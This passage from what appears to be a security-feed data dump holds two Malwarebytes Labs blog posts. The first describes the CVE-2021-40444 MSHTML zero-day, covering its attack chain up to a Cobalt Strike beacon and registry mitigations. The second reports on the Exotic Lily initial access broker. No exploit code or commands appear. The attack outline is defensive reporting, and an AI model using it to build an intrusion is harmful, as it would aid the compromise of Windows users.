trust that they won&#x27;t do that. Another problem with this flag is that it doesn&#x27;t survive when it is handled by other applications, like for example, unzipping. Another problem are certain filetypes that use the same MSHTML to view webcontent, but are not protected by Office&#x27;s Protected View security feature. Researcher [Will Dormann](<https://twitter.com/wdormann/status/1435951560006189060>) was able to replicate the attasck using an RTF file.\n\nThe registry fix we posted to prevent ActiveX controls from running in Internet Explorer, were supposed to effectively block the current attacks. But, security researcher Kevin Beaumont has already [discovered a way](<https://twitter.com/GossiTheDog/status/1435570418623070210>) to bypass Microsoft&#x27;s current mitigations to exploit this vulnerability.\n\n### The attack chain\n\nThe researchers have also managed to reconstruct the attack chain with the use of a limited set of samples of malicious docx files. \n\n * Once a user clicks on the &#x27;Enable Editing&#x27; button, the exploit will load a _side.html_ file by using the mhtml protocol to open a URL. The _side.html _file is hosted at a remote site and will be loaded as a Word template.\n * The Internet Explorer browser will be started to load the HTML, and its obfuscated JavaScript code will exploit the CVE-2021-40444 vulnerability to create a malicious ActiveX control.\n * This ActiveX control will download a _ministry.cab_ file from a remote site.\n * And extract a _championship.inf_ file, which is actually a DLL, and execute it as a CPL file by using rundll32.exe.\n * The ultimate payload is a Cobalt Strike beacon, which would allow the threat actor to gain remote access to the device.\n\nGiven the few days that are left until next patch Tuesday, it is doubtful whether Microsoft will be able to come up with an effective patch.\n\nConsider me one happy camper that Malwarebytes does not rely on the MoTW flag.\n\n_This is what happened when I tried to &quot;edit&quot; the Word doc the researchers analyzed_\n\n## Update september 13, 2021\n\nAs [reported by BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/>) threat actors are sharing PoCs, tutorials and exploits on hacking forums, so that every script kiddy and wannabe hacker can follow step-by-step instructions to build their own attacks. Since the method we mentioned that uses an RTF file even works in Windows explorer file previews. This means this vulnerability can be exploited by viewing a malicious document using the Windows Explorer preview feature.\n\nSince this was discovered, Microsoft has added the following mitigation to disable previewing of RTF and Word documents:\n\n 1. In the Registry Editor (regedit.exe), navigate to the appropriate registry key: **For Word documents, navigate to these keys:**\n * HKEY_CLASSES_ROOT.docx\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT.doc\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT.docm\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} **For rich text files (RTF), navigate to this key:**\n * HKEY_CLASSES_ROOT.rtf\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n 2. Export a copy of the Registry key as a backup.\n 3. Now double-click **Name** and in the **Edit String** dialog box, delete the Value Data.\n 4. Click **OK**,\n\nWord document and RTF file previews are now disabled in Windows Explorer.\n\nTo enable Windows Explorer preview for these documents, double-click on the backup .reg file you created in step 2 above.\n\nStay safe,everyone!\n\nThe post [[updated] Windows MSHTML zero-day actively exploited, mitigations required](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-08T11:04:07", "type": "malwarebytes", "title": "[updated] Windows MSHTML zero-day actively exploited, mitigations required", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T11:04:07", "id": "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-18T23:27:45", "description": "The Google Threat Analysis Group (TAG) has shared their observations about a group of cybercriminals called Exotic Lily. This group has specialized itself as an initial access broker, which means they find a vulnerability in an organization&#x27;s defenses, exploit that vulnerability, and sell the access to the victim&#x27;s network to an interested party, several times over with different victims.\n\nAmong these interested parties TAG found the [Conti](<https://blog.malwarebytes.com/threat-spotlight/2021/05/threat-spotlight-conti-the-ransomware-used-in-the-hse-healthcare-attack/>) and Diavol ransomware groups. Because Exotic Lily&#x27;s methods involved a lot of detail, they are believed to require a level of human interaction that is rather unusual for cybercrime groups focused on large scale operations.\n\n## Initial access broker\n\nLike in any maturing industry, you can expect to see specialization and diversification. Initial access brokers are an example of specialized cybercriminals. They will use a vulnerability to gain initial access, and, probably based on the nature of the target, sell this access to other cybercriminals that can use this access to deploy their specific malware.\n\nThese initial access brokers are different from the usual ransomware affiliates that will deploy the ransomware they are affiliated with themselves and use the infrastructure provided by the ransomware as a service (RaaS) group to get a chunk of the ransom if the victim decides to pay. The RaaS will provide the encryption software, the contact and leak sites, and negotiate the ransom with the victim. An initial access broker will inform another cybercriminal by letting them know they have found a way in at company xyz, and inquire how much they are willing to pay for that access.\n\n## Exotic Lily\n\nFrom the [TAG blog](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) we can learn that Exotic Lily was very much specialized. Their initial attack vector was email. Initially, they were targeting specific industries such as IT, cybersecurity, and healthcare, but that focus has become less stringent.\n\nTheir email campaigns gained credibility by spoofing companies and employees. Their email campaigns were targeted to a degree that they are believed to be sent by real human operators using little to no automation. To evade detection mechanisms they used common services like WeTransfer, TransferNow, and OneDrive to deliver the payload.\n\nLast year, researchers found that Exotic Lily used the vulnerability listed as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), a Microsoft MSHTML Remote Code Execution (RCE) vulnerability. Microsoft also posted a [blog](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) about attacks that exploited this vulnerability. Later, the group shifted to using customized versions of [BazarLoader](<https://blog.malwarebytes.com/detections/trojan-bazar/>) delivered inside ISO files.\n\nBased on the fact that the Exotic Lily\u2019s operations require a lot of human interaction, the researchers did an analysis of the \u201cworking hours\u201d and came to the conclusion that it looks like a regular 9 to 5 operation located in a Central or Eastern Europe time zone.\n\n## Social engineering\n\nAs with most email campaigns the amount of social engineering largely defines how successful such a campaign can be. Between the millions of emails sent in a &quot;spray-and-pray&quot; attack, to the thousands that Exotic Lily sends out per day, there is a huge difference in success rate.\n\nExotic Lily used identity [spoofing](<https://blog.malwarebytes.com/cybercrime/2016/06/email-spoofing/>) where they replaced the TLD for a legitimate domain and replaced it with \u201c.us\u201d, \u201c.co\u201d or \u201c.biz\u201d. At first, t